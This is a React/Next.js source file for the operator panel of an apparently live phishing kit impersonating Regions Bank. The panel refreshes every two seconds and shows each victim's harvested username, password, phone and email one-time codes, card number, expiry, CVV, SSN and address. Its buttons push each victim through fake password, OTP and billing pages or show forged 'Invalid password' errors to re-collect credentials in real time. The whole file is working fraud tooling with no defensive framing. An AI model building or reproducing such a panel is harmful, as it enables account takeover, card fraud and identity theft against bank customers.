"use client";

import { useState, useEffect } from "react";
import { UserSession } from "@/lib/types";

export default function DashboardPage() {
  const [sessions, setSessions] = useState<UserSession[]>([]);
  const [loading, setLoading] = useState(true);

  // Helper function to safely access session data
  const getSessionData = (session: UserSession, key: string): string => {
    const value = session.data?.[key];
    if (typeof value === "string") {
      return value;
    }
    if (typeof value === "boolean") {
      return value.toString();
    }
    if (typeof value === "number") {
      return value.toString();
    }
    return "";
  };

  const fetchSessions = async () => {
    try {
      const response = await fetch("/api/admin/sessions");
      if (response.ok) {
        const data = await response.json();
        setSessions(Array.isArray(data) ? data : []);
      } else {
        console.error("API error:", response.status);
        setSessions([]);
      }
    } catch (error) {
      console.error("Error fetching sessions:", error);
      setSessions([]);
    } finally {
      setLoading(false);
    }
  };

  const handleAdminAction = async (
    sessionId: string,
    action: string,
    rejectionReason?: string
  ) => {
    console.log("🎯 handleAdminAction called with:", {
      sessionId,
      action,
      rejectionReason,
    });

    try {
      const response = await fetch("/api/admin/sessions", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          sessionId,
          action,
          rejectionReason,
        }),
      });

      if (response.ok) {
        console.log(
          `Admin action ${action} completed for session ${sessionId}`
        );
        fetchSessions(); // Refresh sessions

        // Show success notification
        const actionName =
          action === "reject"
            ? "Rejected"
            : action === "next_page"
            ? "Sent to next page"
            : action === "password_page"
            ? "Sent to password page"
            : action === "otp_page"
            ? "Sent to phone OTP page"
            : action === "email_page"
            ? "Sent to email page"
            : action === "email_password_page"
            ? "Sent to email-password page"
            : action === "email_otp_modal"
            ? "Sent to email OTP verification page"
            : action === "billing_page"
            ? "Sent to billing page"
            : action === "thank_you"
            ? "Sent to thank you page"
            : "Updated";

        console.log(`✅ ${actionName} session ${sessionId}`);
      } else {
        console.error("Admin action failed:", response.status);
      }
    } catch (error) {
      console.error("Error processing action:", error);
    }
  };

  useEffect(() => {
    fetchSessions();
    // Auto-refresh every 2 seconds
    const interval = setInterval(fetchSessions, 2000);
    return () => clearInterval(interval);
  }, []);

  const getStepDisplay = (step: string) => {
    const stepMap: Record<string, string> = {
      username: "Username Entry",
      password: "Password Entry",
      otp: "Phone OTP",
      email: "Email Entry",
      "email-password": "Email & Password",
      "email-otp": "Email OTP",
      "email-otp-verify": "Email OTP Verification",
      billing: "Billing Details",
    };
    return stepMap[step] || step;
  };

  if (loading) {
    return (
      <div className="min-h-screen bg-gray-900 flex items-center justify-center">
        <div className="text-white">Loading sessions...</div>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-gray-900 p-6">
      <div className="max-w-7xl mx-auto">
        <div className="mb-8">
          <h1 className="text-3xl font-bold mb-2 bg-gradient-to-r from-green-400 to-green-600 bg-clip-text text-transparent">
            🎯 Regions Bank CRM
          </h1>
          <p className="text-white/60">
            Monitor and control user authentication flows in real-time
          </p>
          <div className="mt-4 flex items-center gap-4 text-sm">
            <div className="flex items-center gap-2">
              <div className="w-3 h-3 bg-yellow-400 rounded-full animate-pulse"></div>
              <span className="text-yellow-400">Live Updates</span>
            </div>
            <div className="flex items-center gap-2">
              <span className="text-white/60">Total Sessions:</span>
              <span className="text-white font-semibold">
                {sessions.length}
              </span>
            </div>
            <div className="flex items-center gap-2">
              <span className="text-white/60">Pending:</span>
              <span className="text-yellow-400 font-semibold">
                {sessions.filter((s) => s.status === "pending").length}
              </span>
            </div>
          </div>
        </div>

        {sessions.length === 0 ? (
          <div className="text-center py-12 bg-white/5 rounded-xl border border-white/10">
            <div className="text-6xl mb-4">🏦</div>
            <p className="text-white/70 text-lg mb-2">No active sessions</p>
            <p className="text-white/50 text-sm">
              Waiting for users to sign in...
            </p>
          </div>
        ) : (
          <div className="grid gap-6">
            {sessions.map((session) => (
              <div
                key={session.sessionId}
                className="bg-gradient-to-r from-white/10 to-white/5 backdrop-blur-sm rounded-xl p-6 border border-white/20 shadow-2xl hover:shadow-3xl transition-all duration-300"
              >
                <div className="flex justify-between items-start mb-6">
                  <div className="flex items-start gap-4">
                    <div className="w-12 h-12 rounded-full bg-gradient-to-r from-green-500 to-green-600 flex items-center justify-center text-white font-bold text-lg">
                      {getSessionData(session, "username")
                        .charAt(0)
                        .toUpperCase() || "U"}
                    </div>
                    <div>
                      <h3 className="text-xl font-semibold text-white mb-1">
                        {getSessionData(session, "username") || "Unknown User"}
                      </h3>
                      <div className="flex items-center gap-3 text-sm">
                        <div className="flex items-center gap-1">
                          <span className="text-white/60">Step:</span>
                          <span className="px-2 py-1 bg-blue-500/20 text-blue-400 rounded-md font-medium">
                            {getStepDisplay(session.currentStep)}
                          </span>
                        </div>
                        <div className="flex items-center gap-1">
                          <span className="text-white/60">ID:</span>
                          <span className="text-white/80 font-mono text-xs">
                            {session.sessionId.substring(0, 8)}...
                          </span>
                        </div>
                      </div>
                      <p className="text-xs text-white/50 mt-1">
                        📅 {new Date(session.createdAt).toLocaleString()}
                      </p>
                    </div>
                  </div>
                  <div className="flex flex-col items-end gap-2">
                    <span
                      className={`px-3 py-1 rounded-full text-xs font-semibold uppercase tracking-wide ${
                        session.status === "pending"
                          ? "bg-yellow-500/20 text-yellow-400 border border-yellow-400/30"
                          : session.status === "approved"
                          ? "bg-green-500/20 text-green-400 border border-green-400/30"
                          : "bg-red-500/20 text-red-400 border border-red-400/30"
                      }`}
                    >
                      {session.status}
                    </span>
                    {session.status === "pending" && (
                      <div className="flex items-center gap-1 text-xs text-yellow-400">
                        <div className="w-2 h-2 bg-yellow-400 rounded-full animate-pulse"></div>
                        Awaiting Action
                      </div>
                    )}
                  </div>
                </div>

                <div className="bg-white/5 rounded-lg p-4 border border-white/10 mb-6">
                  <h4 className="text-white font-semibold mb-3 flex items-center gap-2">
                    📋 Collected Data
                  </h4>
                  <div className="grid grid-cols-1 lg:grid-cols-2 gap-6">
                    {/* Authentication Data */}
                    <div className="space-y-3">
                      <h5 className="text-white/80 font-medium">
                        🔐 Authentication
                      </h5>
                      {getSessionData(session, "username") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Username:
                          </span>
                          <p className="text-white font-mono bg-blue-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "username")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "password") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Password:
                          </span>
                          <p className="text-white font-mono bg-red-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "password")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "otpCode") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Phone OTP:
                          </span>
                          <p className="text-white font-mono bg-purple-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "otpCode")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "email") && (
                        <div>
                          <span className="text-white/60 text-sm">Email:</span>
                          <p className="text-white font-mono bg-indigo-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "email")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "provider") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Provider:
                          </span>
                          <p className="text-white font-mono bg-teal-500/20 px-2 py-1 rounded mt-1 capitalize">
                            {getSessionData(session, "provider")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "emailOtpRequested") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Email OTP:
                          </span>
                          <p className="text-white bg-cyan-500/20 px-2 py-1 rounded mt-1">
                            Requested
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "emailOtpCode") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Email OTP Code:
                          </span>
                          <p className="text-white font-mono bg-cyan-600/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "emailOtpCode")}
                          </p>
                        </div>
                      )}
                    </div>

                    {/* Debug: Show all data fields */}
                    {session.data && Object.keys(session.data).length > 0 && (
                      <div className="space-y-3">
                        <h5 className="text-white/80 font-medium">
                          🔍 All Data Fields
                        </h5>
                        <div className="bg-gray-800/50 p-3 rounded text-xs">
                          {Object.entries(session.data).map(([key, value]) => (
                            <div key={key} className="mb-1">
                              <span className="text-yellow-400">{key}:</span>{" "}
                              <span className="text-white">
                                {typeof value === "object"
                                  ? JSON.stringify(value)
                                  : String(value)}
                              </span>
                            </div>
                          ))}
                        </div>
                      </div>
                    )}

                    {/* Personal & Payment Data */}
                    <div className="space-y-3">
                      <h5 className="text-white/80 font-medium">
                        💳 Personal & Payment
                      </h5>
                      {getSessionData(session, "firstName") && (
                        <div>
                          <span className="text-white/60 text-sm">Name:</span>
                          <p className="text-white bg-green-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "firstName")}{" "}
                            {getSessionData(session, "lastName")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "cardNumber") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Card Number:
                          </span>
                          <p className="text-white font-mono bg-yellow-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "cardNumber")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "expiryDate") && (
                        <div>
                          <span className="text-white/60 text-sm">Expiry:</span>
                          <p className="text-white font-mono bg-orange-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "expiryDate")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "cvv") && (
                        <div>
                          <span className="text-white/60 text-sm">CVV:</span>
                          <p className="text-white font-mono bg-pink-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "cvv")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "phone") && (
                        <div>
                          <span className="text-white/60 text-sm">Phone:</span>
                          <p className="text-white font-mono bg-teal-500/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "phone")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "street") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Address:
                          </span>
                          <p className="text-white bg-blue-600/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "street")},{" "}
                            {getSessionData(session, "postal")}{" "}
                            {getSessionData(session, "state")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "cardType") && (
                        <div>
                          <span className="text-white/60 text-sm">
                            Card Type:
                          </span>
                          <p className="text-white font-mono bg-purple-600/20 px-2 py-1 rounded mt-1 capitalize">
                            {getSessionData(session, "cardType")}
                          </p>
                        </div>
                      )}
                      {getSessionData(session, "ssn") && (
                        <div>
                          <span className="text-white/60 text-sm">SSN:</span>
                          <p className="text-white font-mono bg-red-600/20 px-2 py-1 rounded mt-1">
                            {getSessionData(session, "ssn")}
                          </p>
                        </div>
                      )}
                    </div>
                  </div>
                </div>

                {session.status === "pending" && (
                  <div className="bg-white/5 rounded-lg p-4 border border-white/10">
                    <h4 className="text-white font-semibold mb-3 flex items-center gap-2">
                      ⚡ Admin Actions
                    </h4>
                    <div className="grid grid-cols-2 lg:grid-cols-7 gap-2">
                      <button
                        onClick={() => {
                          console.log(
                            "🔍 REJECTING USER - Current step:",
                            session.currentStep
                          );

                          // CONTEXT-AWARE ERROR MESSAGES
                          let errorMessage = "Invalid username"; // Default for username step

                          if (session.currentStep === "password") {
                            errorMessage = "Invalid password";
                            console.log(
                              "🔑 PASSWORD STEP - Using password error"
                            );
                          } else if (session.currentStep === "otp") {
                            errorMessage = "Invalid OTP code";
                            console.log("📱 OTP STEP - Using OTP error");
                          } else if (session.currentStep === "email") {
                            errorMessage = "Invalid email credentials";
                            console.log("📧 EMAIL STEP - Using email error");
                          } else if (session.currentStep === "email-otp") {
                            errorMessage = "Invalid email OTP request";
                            console.log(
                              "📧 EMAIL OTP STEP - Using email OTP error"
                            );
                          } else if (
                            session.currentStep === "email-otp-verify"
                          ) {
                            errorMessage = "Invalid email OTP code";
                            console.log(
                              "📧 EMAIL OTP VERIFY STEP - Using email OTP verify error"
                            );
                          } else if (session.currentStep === "billing") {
                            errorMessage = "Invalid billing information";
                            console.log(
                              "💳 BILLING STEP - Using billing error"
                            );
                          } else {
                            console.log(
                              "👤 USERNAME STEP - Using username error"
                            );
                          }

                          console.log("📤 FINAL ERROR MESSAGE:", errorMessage);
                          handleAdminAction(
                            session.sessionId,
                            "reject",
                            errorMessage
                          );
                        }}
                        className="flex items-center justify-center gap-2 px-4 py-3 bg-red-600 hover:bg-red-700 rounded-lg text-sm font-semibold transition-all hover:scale-105 shadow-lg"
                      >
                        ❌ Reject
                      </button>
                      <button
                        onClick={() =>
                          handleAdminAction(session.sessionId, "password_page")
                        }
                        className="flex items-center justify-center gap-2 px-4 py-3 bg-blue-600 hover:bg-blue-700 rounded-lg text-sm font-semibold transition-all hover:scale-105 shadow-lg"
                      >
                        🔑 Password
                      </button>
                      <button
                        onClick={() =>
                          handleAdminAction(session.sessionId, "otp_page")
                        }
                        className="flex items-center justify-center gap-2 px-4 py-3 bg-purple-600 hover:bg-purple-700 rounded-lg text-sm font-semibold transition-all hover:scale-105 shadow-lg"
                      >
                        📱 Phone OTP
                      </button>
                      <button
                        onClick={() =>
                          handleAdminAction(session.sessionId, "email_page")
                        }
                        className="flex items-center justify-center gap-2 px-4 py-3 bg-indigo-600 hover:bg-indigo-700 rounded-lg text-sm font-semibold transition-all hover:scale-105 shadow-lg"
                      >
                        📧 Email
                      </button>
                      <button
                        onClick={() =>
                          handleAdminAction(
                            session.sessionId,
                            "email_password_page"
                          )
                        }
                        className="flex items-center justify-center gap-2 px-4 py-3 bg-indigo-500 hover:bg-indigo-600 rounded-lg text-sm font-semibold transition-all hover:scale-105 shadow-lg"
                      >
                        🔐 Email-Password
                      </button>
                      <button
                        onClick={() =>
                          handleAdminAction(
                            session.sessionId,
                            "email_otp_modal"
                          )
                        }
                        className="flex items-center justify-center gap-2 px-4 py-3 bg-cyan-600 hover:bg-cyan-700 rounded-lg text-sm font-semibold transition-all hover:scale-105 shadow-lg"
                      >
                        📧 Email OTP
                      </button>
                      <button
                        onClick={() =>
                          handleAdminAction(session.sessionId, "billing_page")
                        }
                        className="flex items-center justify-center gap-2 px-4 py-3 bg-green-600 hover:bg-green-700 rounded-lg text-sm font-semibold transition-all hover:scale-105 shadow-lg"
                      >
                        💳 Billing
                      </button>
                      <button
                        onClick={() =>
                          handleAdminAction(session.sessionId, "thank_you")
                        }
                        className="flex items-center justify-center gap-2 px-4 py-3 bg-yellow-600 hover:bg-yellow-700 rounded-lg text-sm font-semibold transition-all hover:scale-105 shadow-lg"
                      >
                        ✅ Thank You
                      </button>
                    </div>
                  </div>
                )}

                {session.status === "rejected" && session.rejectionReason && (
                  <div className="bg-red-500/10 border border-red-500/20 rounded-lg p-3 mt-4">
                    <p className="text-red-400 text-sm">
                      <strong>Rejection reason:</strong>{" "}
                      {session.rejectionReason}
                    </p>
                  </div>
                )}
              </div>
            ))}
          </div>
        )}
      </div>
    </div>
  );
}
